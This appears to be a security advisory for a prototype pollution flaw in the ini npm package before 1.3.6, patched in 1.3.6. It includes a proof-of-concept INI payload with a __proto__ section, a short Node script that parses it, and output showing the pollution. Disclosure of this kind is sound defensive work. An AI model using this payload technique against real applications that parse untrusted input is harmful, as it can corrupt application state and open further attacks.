The ini
npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with ini.parse
, they will pollute the prototype on the application. This can be exploited further depending on the context.
This has been patched in 1.3.6.
payload.ini
[__proto__]
polluted = "polluted"
poc.js:
var fs = require('fs')
var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
{ "nvd_published_at": "2020-12-11T11:15:00Z", "cwe_ids": [ "CWE-1321" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2020-12-10T16:51:39Z" }